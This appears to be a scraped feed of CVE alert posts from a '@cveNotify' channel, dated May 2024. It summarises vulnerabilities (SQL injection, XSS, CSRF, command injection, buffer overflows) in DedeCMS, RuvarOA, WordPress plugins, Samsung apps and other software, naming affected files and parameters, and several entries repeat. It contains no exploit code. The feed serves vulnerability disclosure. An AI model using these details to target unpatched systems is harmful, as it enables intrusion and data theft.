🚨 CVE-2024-32370An issue in HSC Cybersecurity HC Mailinspector 5.2.17-3 through 5.2.18 allows a remote attacker to obtain sensitive information via a crafted payload to the id parameter in the mliSystemUsers.php component.🎖@cveNotify |
|
| 2024-05-07 20:37:36 |
🚨 CVE-2024-4592A vulnerability classified as problematic was found in DedeCMS 5.7. This vulnerability affects unknown code of the file /src/dede/sys_group_edit.php. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263314 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-07 20:37:35 |
🚨 CVE-2024-4591A vulnerability classified as problematic has been found in DedeCMS 5.7. This affects an unknown part of the file /src/dede/sys_group_add.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263313 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-07 20:37:32 |
🚨 CVE-2024-4590A vulnerability was found in DedeCMS 5.7. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /src/dede/sys_info.php. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263312. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-07 20:37:31 |
🚨 CVE-2024-33782MP-SPDZ v0.3.8 was discovered to contain a stack overflow via the function OTExtensionWithMatrix::extend in /OT/OTExtensionWithMatrix.cpp. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted message.🎖@cveNotify |
|
| 2024-05-07 20:37:30 |
🚨 CVE-2024-33780MP-SPDZ v0.3.8 was discovered to contain a segmentation violation via the function osuCrypto::copyOut at /Tools/SilentPprf.cpp. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted message.🎖@cveNotify |
|
| 2024-05-07 20:37:26 |
🚨 CVE-2024-31456GLPI is a Free Asset and IT Management Software package. Prior to 10.0.15, an authenticated user can exploit a SQL injection vulnerability from map search. This vulnerability is fixed in 10.0.15.🎖@cveNotify |
|
| 2024-05-07 20:37:25 |
🚨 CVE-2024-28148An authenticated user could potentially access metadata for a datasource they are not authorized to view by submitting a targeted REST API request.This issue affects Apache Superset: before 4.0.0.Users are recommended to upgrade to version 4.0.0, which fixes the issue.🎖@cveNotify |
|
| 2024-05-07 20:37:24 |
🚨 CVE-2023-46012Buffer Overflow vulnerability LINKSYS EA7500 3.0.1.207964 allows a remote attacker to execute arbitrary code via an HTTP request to the IGD UPnP.🎖@cveNotify |
|
| 2024-05-07 19:37:32 |
🚨 CVE-2024-4558Use after free in ANGLE in Google Chrome prior to 124.0.6367.155 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-07 19:37:31 |
🚨 CVE-2024-34314CmsEasy v7.7.7.9 was discovered to contain a local file inclusion vunerability via the file_get_contents function in the fetch_action method of /admin/template_admin.php. This vulnerability allows attackers to read arbitrary files.🎖@cveNotify |
|
| 2024-05-07 19:37:30 |
🚨 CVE-2024-25514RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the template_id parameter at /SysManage/wf_template_child_field_list.aspx.🎖@cveNotify |
|
| 2024-05-07 19:37:27 |
🚨 CVE-2024-25513RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the file_id parameter at /CorporateCulture/kaizen_download.aspx.🎖@cveNotify |
|
| 2024-05-07 19:37:26 |
🚨 CVE-2024-25510RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the id parameter at /AddressBook/address_public_show.aspx.🎖@cveNotify |
|
| 2024-05-07 19:37:25 |
🚨 CVE-2024-25509RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the sys_file_storage_id parameter at /WorkFlow/wf_file_download.aspx.🎖@cveNotify |
|
| 2024-05-07 19:37:24 |
🚨 CVE-2024-3661By design, the DHCP protocol does not authenticate messages, including for example the classless static route option (121). An attacker with the ability to send DHCP messages can manipulate routes to redirect VPN traffic, allowing the attacker to read, disrupt, or possibly modify network traffic that was expected to be protected by the VPN. Many, if not most VPN systems based on IP routing are susceptible to such attacks.🎖@cveNotify |
|
| 2024-05-07 16:37:33 |
🚨 CVE-2024-4596A vulnerability was found in Kimai up to 2.15.0 and classified as problematic. Affected by this issue is some unknown functionality of the component Session Handler. The manipulation of the argument PHPSESSIONID leads to information disclosure. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. Upgrading to version 2.16.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-263318 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-07 16:37:32 |
🚨 CVE-2024-34341Trix is a rich text editor. The Trix editor, versions prior to 2.1.1, is vulnerable to arbitrary code execution when copying and pasting content from the web or other documents with markup into the editor. The vulnerability stems from improper sanitization of pasted content, allowing an attacker to embed malicious scripts which are executed within the context of the application. Users should upgrade to Trix editor version 2.1.1 or later, which incorporates proper sanitization of input from copied content.🎖@cveNotify |
|
| 2024-05-07 16:37:31 |
🚨 CVE-2024-33858An issue was discovered in Logpoint before 7.4.0. A path injection vulnerability is seen while adding a CSV enrichment source. The source_name parameter could be changed to an absolute path; this will write the CSV file to that path inside the /tmp directory.🎖@cveNotify |
|
| 2024-05-07 16:37:30 |
🚨 CVE-2024-33857An issue was discovered in Logpoint before 7.4.0. Due to a lack of input validation on URLs in threat intelligence, an attacker with low-level access to the system can trigger Server Side Request Forgery.🎖@cveNotify |
|
| 2024-05-07 16:37:26 |
🚨 CVE-2024-33146J2EEFAST v2.7.0 was discovered to contain a SQL injection vulnerability via the sql_filter parameter in the export function.🎖@cveNotify |
|
| 2024-05-07 16:37:25 |
🚨 CVE-2024-33144J2EEFAST v2.7.0 was discovered to contain a SQL injection vulnerability via the sql_filter parameter in the findApplyedTasksPage function in BpmTaskMapper.xml.🎖@cveNotify |
|
| 2024-05-07 16:37:24 |
🚨 CVE-2024-33139J2EEFAST v2.7.0 was discovered to contain a SQL injection vulnerability via the sql_filter parameter in the findpage function.🎖@cveNotify |
|
| 2024-05-07 15:37:42 |
🚨 CVE-2024-4594A vulnerability, which was classified as problematic, was found in DedeCMS 5.7. Affected is an unknown function of the file /src/dede/sys_safe.php. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263316. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-07 15:37:41 |
🚨 CVE-2024-34523AChecker 1.5 allows remote attackers to read the contents of arbitrary files via the download.php path parameter by using Unauthenticated Path Traversal. This occurs through readfile in PHP. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-05-07 15:37:38 |
🚨 CVE-2024-34342react-pdf displays PDFs in React apps. If PDF.js is used to load a malicious PDF, and PDF.js is configured with `isEvalSupported` set to `true` (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain. This vulnerability is fixed in 7.7.3 and 8.0.2.🎖@cveNotify |
|
| 2024-05-07 15:37:37 |
🚨 CVE-2024-33124Roothub v2.6 was discovered to contain a SQL injection vulnerability via the nodeTitle parameter in the parentNode() function..🎖@cveNotify |
|
| 2024-05-07 15:37:36 |
🚨 CVE-2024-33120Roothub v2.5 was discovered to contain an arbitrary file upload vulnerability via the customPath parameter in the upload() function. This vulnerability allows attackers to execute arbitrary code via a crafted JSP file.🎖@cveNotify |
|
| 2024-05-07 15:37:32 |
🚨 CVE-2024-32867Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to 7.0.5 and 6.0.19, various problems in handling of fragmentation anomalies can lead to mis-detection of rules and policy. This vulnerability is fixed in 7.0.5 or 6.0.19.🎖@cveNotify |
|
| 2024-05-07 15:37:31 |
🚨 CVE-2024-32663Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to 7.0.5 and 6.0.19, a small amount of HTTP/2 traffic can lead to Suricata using a large amount of memory. The issue has been addressed in Suricata 7.0.5 and 6.0.19. Workarounds include disabling the HTTP/2 parser and reducing `app-layer.protocols.http2.max-table-size` value (default is 65536).🎖@cveNotify |
|
| 2024-05-07 15:37:30 |
🚨 CVE-2024-32370An issue in HSC Cybersecurity HC Mailinspector 5.2.17-3 through 5.2.18 allows a remote attacker to obtain sensitive information via a crafted payload to the id parameter in the mliSystemUsers.php component.🎖@cveNotify |
|
| 2024-05-07 15:37:26 |
🚨 CVE-2023-38907An issue in TPLink Smart Bulb Tapo series L530 before 1.2.4, L510E before 1.1.0, L630 before 1.0.4, P100 before 1.5.0, and Tapo Application 2.8.14 allows a remote attacker to replay old messages encrypted with a still valid session key.🎖@cveNotify |
|
| 2024-05-07 15:37:25 |
🚨 CVE-2023-38908An issue in TPLink Smart Bulb Tapo series L530 before 1.2.4, L510E before 1.1.0, L630 before 1.0.4, P100 before 1.5.0, and Tapo Application 2.8.14 allows a remote attacker to obtain sensitive information via the TSKEP authentication function.🎖@cveNotify |
|
| 2024-05-07 15:37:24 |
🚨 CVE-2023-38906An issue in TPLink Smart Bulb Tapo series L530 1.1.9, L510E 1.0.8, L630 1.0.3, P100 1.4.9, Smart Camera Tapo series C200 1.1.18, and Tapo Application 2.8.14 allows a remote attacker to obtain sensitive information via the authentication code for the UDP message.🎖@cveNotify |
|
| 2024-05-07 14:37:38 |
🚨 CVE-2024-4593A vulnerability, which was classified as problematic, has been found in DedeCMS 5.7. This issue affects some unknown processing of the file /src/dede/sys_multiserv.php. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263315. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-07 14:37:37 |
🚨 CVE-2024-4592A vulnerability classified as problematic was found in DedeCMS 5.7. This vulnerability affects unknown code of the file /src/dede/sys_group_edit.php. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263314 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-07 14:37:36 |
🚨 CVE-2024-4591A vulnerability classified as problematic has been found in DedeCMS 5.7. This affects an unknown part of the file /src/dede/sys_group_add.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263313 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-07 14:37:32 |
🚨 CVE-2024-33783MP-SPDZ v0.3.8 was discovered to contain a segmentation violation via the function osuCrypto::SilentMultiPprfReceiver::expand in /Tools/SilentPprf.cpp. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted message.🎖@cveNotify |
|
| 2024-05-07 14:37:31 |
🚨 CVE-2024-33781MP-SPDZ v0.3.8 was discovered to contain a stack overflow via the function octetStream::get_bytes in /Tools/octetStream.cpp. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted message.🎖@cveNotify |
|
| 2024-05-07 14:37:30 |
🚨 CVE-2024-33780MP-SPDZ v0.3.8 was discovered to contain a segmentation violation via the function osuCrypto::copyOut at /Tools/SilentPprf.cpp. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted message.🎖@cveNotify |
|
| 2024-05-07 14:37:26 |
🚨 CVE-2024-31456GLPI is a Free Asset and IT Management Software package. Prior to 10.0.15, an authenticated user can exploit a SQL injection vulnerability from map search. This vulnerability is fixed in 10.0.15.🎖@cveNotify |
|
| 2024-05-07 14:37:25 |
🚨 CVE-2024-28148An authenticated user could potentially access metadata for a datasource they are not authorized to view by submitting a targeted REST API request.This issue affects Apache Superset: before 4.0.0.Users are recommended to upgrade to version 4.0.0, which fixes the issue.🎖@cveNotify |
|
| 2024-05-07 14:37:24 |
🚨 CVE-2023-46012Buffer Overflow vulnerability LINKSYS EA7500 3.0.1.207964 allows a remote attacker to execute arbitrary code via an HTTP request to the IGD UPnP.🎖@cveNotify |
|
| 2024-05-07 14:07:47 |
🚨 CVE-2024-34534A SQL injection vulnerability in Cybrosys Techno Solutions Text Commander module (aka text_commander) 16.0 through 16.0.1 allows a remote attacker to gain privileges via the data parameter to models/ir_model.py:IrModel::chech_model.🎖@cveNotify |
|
| 2024-05-07 14:07:46 |
🚨 CVE-2024-34532A SQL injection vulnerability in Yvan Dotet PostgreSQL Query Deluxe module (aka query_deluxe) 17.x before 17.0.0.4 allows a remote attacker to gain privileges via the query parameter to models/querydeluxe.py:QueryDeluxe::get_result_from_query.🎖@cveNotify |
|
| 2024-05-07 14:07:45 |
🚨 CVE-2024-34413Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SliceWP allows Stored XSS.This issue affects SliceWP: from n/a through 1.1.10.🎖@cveNotify |
|
| 2024-05-07 14:07:42 |
🚨 CVE-2024-28725Cross Site Scripting (XSS) vulnerability in YzmCMS 7.0 allows attackers to run arbitrary code via Ads Management, Carousel Management, and System Settings.🎖@cveNotify |
|
| 2024-05-07 14:07:41 |
🚨 CVE-2024-1695A potential security vulnerability has been identified in the HP Application Enabling Software Driver for certain HP PC products, which might allow escalation of privilege. HP is releasing software updates to mitigate this potential vulnerability.🎖@cveNotify |
|
| 2024-05-07 12:37:36 |
🚨 CVE-2024-4600Cross-Site Request Forgery vulnerability in Socomec Net Vision, version 7.20. This vulnerability could allow an attacker to trick registered users into performing critical actions, such as adding and updating accounts, due to lack of proper sanitisation of the ‘set_param.cgi’ file.🎖@cveNotify |
|
| 2024-05-07 12:37:32 |
🚨 CVE-2024-4585A vulnerability, which was classified as problematic, was found in DedeCMS 5.7. This affects an unknown part of the file /src/dede/member_type.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263307. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-07 12:37:31 |
🚨 CVE-2024-4538IDOR vulnerability in Janto Ticketing Software affecting version 4.3r10. This vulnerability could allow a remote user to obtain a user's event ticket by creating a specific request with the ticket reference ID, leading to the exposure of sensitive user data.🎖@cveNotify |
|
| 2024-05-07 12:37:30 |
🚨 CVE-2024-34455Buildroot before 0b2967e lacks the sticky bit for the /dev/shm directory.🎖@cveNotify |
|
| 2024-05-07 12:37:26 |
🚨 CVE-2023-40533An uninitialized memory use vulnerability exists in Tinyproxy 1.11.1 while parsing HTTP requests. In certain configurations, a specially crafted HTTP request can result in disclosure of data allocated on the heap, which could contain sensitive information. An attacker can make an unauthenticated HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2024-05-07 12:37:25 |
🚨 CVE-2024-32017RIOT is a real-time multi-threading operating system that supports a range of devices that are typically 8-bit, 16-bit and 32-bit microcontrollers. The size check in the `gcoap_dns_server_proxy_get()` function contains a small typo that may lead to a buffer overflow in the subsequent `strcpy()`. In detail, the length of the `_uri` string is checked instead of the length of the `_proxy` string. The `_gcoap_forward_proxy_copy_options()` function does not implement an explicit size check before copying data to the `cep->req_etag` buffer that is `COAP_ETAG_LENGTH_MAX` bytes long. If an attacker can craft input so that `optlen` becomes larger than `COAP_ETAG_LENGTH_MAX`, they can cause a buffer overflow. If the input above is attacker-controlled and crosses a security boundary, the impact of the buffer overflow vulnerabilities could range from denial of service to arbitrary code execution. This issue has yet to be patched. Users are advised to add manual bounds checking.🎖@cveNotify |
|
| 2024-05-07 12:37:24 |
🚨 CVE-2024-31225RIOT is a real-time multi-threading operating system that supports a range of devices that are typically 8-bit, 16-bit and 32-bit microcontrollers. The `_on_rd_init()` function does not implement a size check before copying data to the `_result_buf` static buffer. If an attacker can craft a long enough payload, they could cause a buffer overflow. If the unchecked input above is attacker-controlled and crosses a security boundary, the impact of the buffer overflow vulnerability could range from denial of service to arbitrary code execution. This issue has yet to be patched. Users are advised to add manual bounds checking.🎖@cveNotify |
|
| 2024-05-07 11:37:25 |
🚨 CVE-2024-4583A vulnerability classified as problematic was found in Faraday GM8181 and GM828x up to 20240429. Affected by this vulnerability is an unknown functionality of the component Request Handler. The manipulation leads to information disclosure. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The identifier VDB-263305 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-07 11:37:24 |
🚨 CVE-2024-4582A vulnerability classified as critical has been found in Faraday GM8181 and GM828x up to 20240429. Affected is an unknown function of the component NTP Service. The manipulation of the argument ntp_srv leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-263304.🎖@cveNotify |
|
| 2024-05-07 10:37:24 |
🚨 CVE-2023-6810The ClickCease Click Fraud Protection plugin for WordPress is vulnerable to unauthorized access of data due to an improper capability check on the get_settings function in all versions up to, and including, 3.2.4. This makes it possible for authenticated attackers, with author access and above, to retrieve the plugin's configured API keys.🎖@cveNotify |
|
| 2024-05-07 09:37:27 |
🚨 CVE-2024-4345The Startklar Elementor Addons plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'process' function in the 'startklarDropZoneUploadProcess' class in versions up to, and including, 1.7.13. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-05-07 09:37:26 |
🚨 CVE-2024-3576The NPort 5100A Series firmware version v1.6 and prior versions are affected by web server XSS vulnerability. The vulnerability is caused by not correctly neutralizing user-controllable input before placing it in output. Malicious users may use the vulnerability to get sensitive information and escalate privileges.🎖@cveNotify |
|
| 2024-05-07 07:37:30 |
🚨 CVE-2024-3759in OpenHarmony v4.0.0 and prior versions allow a local attacker arbitrary code execution in TCB through use after free.🎖@cveNotify |
|
| 2024-05-07 07:37:26 |
🚨 CVE-2024-3757in OpenHarmony v4.0.0 and prior versions allow a local attacker cause service crash through integer overflow.🎖@cveNotify |
|
| 2024-05-07 07:37:25 |
🚨 CVE-2024-27217in OpenHarmony v4.0.0 and prior versions allow a local attacker arbitrary code execution in pre-installed apps through use after free.🎖@cveNotify |
|
| 2024-05-07 07:37:24 |
🚨 CVE-2024-23808in OpenHarmony v4.0.0 and prior versions allow a local attacker arbitrary code execution in pre-installed apps through use after free or cause DOS through NULL pointer dereference.🎖@cveNotify |
|
| 2024-05-07 06:37:36 |
🚨 CVE-2024-4186The Build App Online plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.0.5. This is due to the 'eb_user_email_verification_key' default value is empty, and the not empty check is missing in the 'eb_user_email_verify' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id. This can only be exploited if the 'Email Verification' setting is enabled.🎖@cveNotify |
|
| 2024-05-07 06:37:35 |
🚨 CVE-2024-3628The EasyEvent WordPress plugin through 1.0.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed🎖@cveNotify |
|
| 2024-05-07 06:37:32 |
🚨 CVE-2024-22472A buffer Overflow vulnerability in Silicon Labs 500 Series Z-Wave devices may allow Denial of Service, and potential Remote Code executionThis issue affects all versions of Silicon Labs 500 Series SDK prior to v6.85.2running on Silicon Labs 500 series Z-wave devices.🎖@cveNotify |
|
| 2024-05-07 06:37:31 |
🚨 CVE-2024-33793netis-systems MEX605 v2.00.06 allows attackers to execute arbitrary OS commands via a crafted payload to the ping test page.🎖@cveNotify |
|
| 2024-05-07 06:37:30 |
🚨 CVE-2023-42950A use after free issue was addressed with improved memory management. This issue is fixed in Safari 17.2, iOS 17.2 and iPadOS 17.2, tvOS 17.2, watchOS 10.2, macOS Sonoma 14.2. Processing maliciously crafted web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-05-07 06:37:26 |
🚨 CVE-2024-23280An injection issue was addressed with improved validation. This issue is fixed in Safari 17.4, macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4, watchOS 10.4, tvOS 17.4. A maliciously crafted webpage may be able to fingerprint the user.🎖@cveNotify |
|
| 2024-05-07 06:37:25 |
🚨 CVE-2024-23254The issue was addressed with improved UI handling. This issue is fixed in tvOS 17.4, macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, Safari 17.4. A malicious website may exfiltrate audio data cross-origin.🎖@cveNotify |
|
| 2024-05-07 06:37:24 |
🚨 CVE-2023-42843An inconsistent user interface issue was addressed with improved state management. This issue is fixed in iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1, Safari 17.1, macOS Sonoma 14.1. Visiting a malicious website may lead to address bar spoofing.🎖@cveNotify |
|
| 2024-05-07 05:37:42 |
🚨 CVE-2024-20870Improper verification of intent by broadcast receiver vulnerability in Galaxy Store prior to version 4.5.71.8 allows local attackers to write arbitrary files with the privilege of Galaxy Store.🎖@cveNotify |
|
| 2024-05-07 05:37:41 |
🚨 CVE-2024-20868Improper input validation in Samsung Notes prior to version 4.4.15 allows local attackers to delete files with Samsung Notes privilege under certain conditions.🎖@cveNotify |
|
| 2024-05-07 05:37:40 |
🚨 CVE-2024-20867Improper privilege management vulnerability in Samsung Email prior to version 6.1.91.14 allows local attackers to access sensitive information.🎖@cveNotify |
|
| 2024-05-07 05:37:37 |
🚨 CVE-2024-20866Authentication bypass vulnerability in Setupwizard prior to SMR May-2024 Release 1 allows physical attackers to skip activation step.🎖@cveNotify |
|
| 2024-05-07 05:37:36 |
🚨 CVE-2024-20864Improper access control vulnerability in DarManagerService prior to SMR May-2024 Release 1 allows local attackers to monitor system resources.🎖@cveNotify |
|
| 2024-05-07 05:37:35 |
🚨 CVE-2024-20862Out-of-bounds write in SveService prior to SMR May-2024 Release 1 allows local privileged attackers to execute arbitrary code.🎖@cveNotify |
|
| 2024-05-07 05:37:31 |
🚨 CVE-2024-20860Improper export of android application components vulnerability in TelephonyUI prior to SMR May-2024 Release 1 allows local attackers to reboot the device without proper permission.🎖@cveNotify |
|
| 2024-05-07 05:37:30 |
🚨 CVE-2024-20857Improper access control vulnerability in startListening of CocktailBarService prior to SMR May-2024 Release 1 allows local attackers to access information of current application.🎖@cveNotify |
|
| 2024-05-07 05:37:26 |
🚨 CVE-2024-20855Improper access control vulnerability in multitasking framework prior to SMR May-2024 Release 1 allows physical attackers to access unlocked screen for a while.🎖@cveNotify |
|
| 2024-05-07 05:37:25 |
🚨 CVE-2024-33792netis-systems MEX605 v2.00.06 allows attackers to execute arbitrary OS commands via a crafted payload to the tracert page.🎖@cveNotify |
|
| 2024-05-07 05:37:24 |
🚨 CVE-2022-40929XXL-JOB 2.2.0 has a Command execution vulnerability in background tasks. NOTE: this is disputed because the issues/4929 report is about an intended and supported use case (running arbitrary Bash scripts on behalf of users).🎖@cveNotify |
|
| 2024-05-07 01:37:26 |
🚨 CVE-2024-23193E-Mails exported as PDF were stored in a cache that did not consider specific session information for the related user account. Users of the same service node could access other users E-Mails in case they were exported as PDF for a brief moment until caches were cleared. Successful exploitation requires good timing and modification of multiple request parameters. Please deploy the provided updates and patch releases. The cache for PDF exports now takes user session information into consideration when performing authorization decisions. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-05-07 01:37:25 |
🚨 CVE-2024-23187Content-ID based embedding of resources in E-Mails could be abused to trigger client-side script code when using the "show more" option. Attackers could perform malicious API requests or extract information from the users account. Exploiting the vulnerability requires user interaction. Please deploy the provided updates and patch releases. CID replacement has been hardened to omit invalid identifiers. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-05-07 01:37:24 |
🚨 CVE-2024-23186E-Mail containing malicious display-name information could trigger client-side script execution when using specific mobile devices. Attackers could perform malicious API requests or extract information from the users account. Please deploy the provided updates and patch releases. We now use safer methods of handling external content when embedding displayname information to the web interface. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-05-07 00:37:24 |
🚨 CVE-2024-2913A race condition vulnerability exists in the mintplex-labs/anything-llm repository, specifically within the user invite acceptance process. Attackers can exploit this vulnerability by sending multiple concurrent requests to accept a single user invite, allowing the creation of multiple user accounts from a single invite link intended for only one user. This bypasses the intended security mechanism that restricts invite acceptance to a single user, leading to unauthorized user creation without detection in the invite tab. The issue is due to the lack of validation for concurrent requests in the backend.🎖@cveNotify |
|
| 2024-05-06 23:37:24 |
🚨 CVE-2024-29941Insecure storage of the ICT MIFARE and DESFire encryption keys in the firmwarebinary allows malicious actors to create credentials for any site code and card number that is using the defaultICT encryption.🎖@cveNotify |
|
| 2024-05-06 20:37:36 |
🚨 CVE-2024-33908Missing Authorization vulnerability in Themesgrove WidgetKit.This issue affects WidgetKit: from n/a through 2.5.0.🎖@cveNotify |
|
| 2024-05-06 20:37:35 |
🚨 CVE-2024-33907Missing Authorization vulnerability in Michael Nelson Print My Blog.This issue affects Print My Blog: from n/a through 3.26.2.🎖@cveNotify |
|
| 2024-05-06 20:37:32 |
🚨 CVE-2024-33602nscd: netgroup cache assumes NSS callback uses in-buffer stringsThe Name Service Cache Daemon's (nscd) netgroup cache can corrupt memorywhen the NSS callback does not store all strings in the provided buffer.The flaw was introduced in glibc 2.15 when the cache was added to nscd.This vulnerability is only present in the nscd binary.🎖@cveNotify |
|
| 2024-05-06 20:37:31 |
🚨 CVE-2024-33600nscd: Null pointer crashes after notfound responseIf the Name Service Cache Daemon's (nscd) cache fails to add a not-foundnetgroup response to the cache, the client request can result in a nullpointer dereference. This flaw was introduced in glibc 2.15 when thecache was added to nscd.This vulnerability is only present in the nscd binary.🎖@cveNotify |
|
| 2024-05-06 20:37:30 |
🚨 CVE-2024-33576Missing Authorization vulnerability in Ollybach WPPizza.This issue affects WPPizza: from n/a through 3.18.10.🎖@cveNotify |
|
| 2024-05-06 20:37:26 |
🚨 CVE-2024-33121Roothub v2.6 was discovered to contain a SQL injection vulnerability via the 's' parameter in the search() function.🎖@cveNotify |
|
| 2024-05-06 20:37:25 |
🚨 CVE-2024-33117crmeb_java v1.3.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the mergeList method in class com.zbkj.front.pub.ImageMergeController.🎖@cveNotify |
|
| 2024-05-06 20:37:24 |
🚨 CVE-2024-34455Buildroot before 0b2967e lacks the sticky bit for the /dev/shm directory.🎖@cveNotify |
|
| 2024-05-06 20:07:44 |
🚨 CVE-2024-33411A SQL injection vulnerability in /model/get_admin_profile.php in Campcodes Complete Web-Based School Management System 1.0 allows attacker to execute arbitrary SQL commands via the my_index parameter.🎖@cveNotify |
|
| 2024-05-06 20:07:43 |
🚨 CVE-2024-33409SQL injection vulnerability in index.php in campcodes Complete Web-Based School Management System 1.0 allows attacker to execute arbitrary SQL commands via the name parameter.🎖@cveNotify |
|
| 2024-05-06 20:07:42 |
🚨 CVE-2024-33407SQL injection vulnerability in /model/delete_record.php in campcodes Complete Web-Based School Management System 1.0 allows attacker to execute arbitrary SQL commands via the id parameter.🎖@cveNotify |
|
| 2024-05-06 20:07:38 |
🚨 CVE-2024-33405SQL injection vulnerability in add_friends.php in campcodes Complete Web-Based School Management System 1.0 allows attacker to execute arbitrary SQL commands via the friend_index parameter.🎖@cveNotify |
|
| 2024-05-06 19:37:44 |
🚨 CVE-2024-34389Missing Authorization vulnerability in AF themes WP Post Author.This issue affects WP Post Author: from n/a through 3.6.4.🎖@cveNotify |
|
| 2024-05-06 19:37:43 |
🚨 CVE-2024-34386Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Lucian Apostol Auto Affiliate Links.This issue affects Auto Affiliate Links: from n/a through 6.4.3.1.🎖@cveNotify |
|
| 2024-05-06 19:37:42 |
🚨 CVE-2024-34380Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in QuantumCloud Conversational Forms for ChatBot allows Stored XSS.This issue affects Conversational Forms for ChatBot: from n/a through 1.2.0.🎖@cveNotify |
|
| 2024-05-06 19:37:38 |
🚨 CVE-2024-34379Cross-Site Request Forgery (CSRF) vulnerability in Rara Theme Restaurant and Cafe.This issue affects Restaurant and Cafe: from n/a through 1.2.1.🎖@cveNotify |
|
| 2024-05-06 19:37:37 |
🚨 CVE-2024-34376Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Theme Freesia Edge allows Stored XSS.This issue affects Edge: from n/a through 2.0.9.🎖@cveNotify |
|
| 2024-05-06 19:37:36 |
🚨 CVE-2024-34375Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPPOOL Sheets To WP Table Live Sync allows Stored XSS.This issue affects Sheets To WP Table Live Sync: from n/a through 3.7.0.🎖@cveNotify |
|
| 2024-05-06 19:37:32 |
🚨 CVE-2024-34373Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in POSIMYTH The Plus Addons for Elementor Page Builder Lite allows Stored XSS.This issue affects The Plus Addons for Elementor Page Builder Lite: from n/a through 5.4.2.🎖@cveNotify |
|
| 2024-05-06 19:37:31 |
🚨 CVE-2024-34371Missing Authorization vulnerability in Hamid Alinia – idehweb Login with phone number.This issue affects Login with phone number: from n/a through 1.7.18.🎖@cveNotify |
|
| 2024-05-06 19:37:30 |
🚨 CVE-2024-34369Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Webpushr Web Push Notifications Webpushr allows Reflected XSS.This issue affects Webpushr: from n/a through 4.35.0.🎖@cveNotify |
|
| 2024-05-06 19:37:26 |
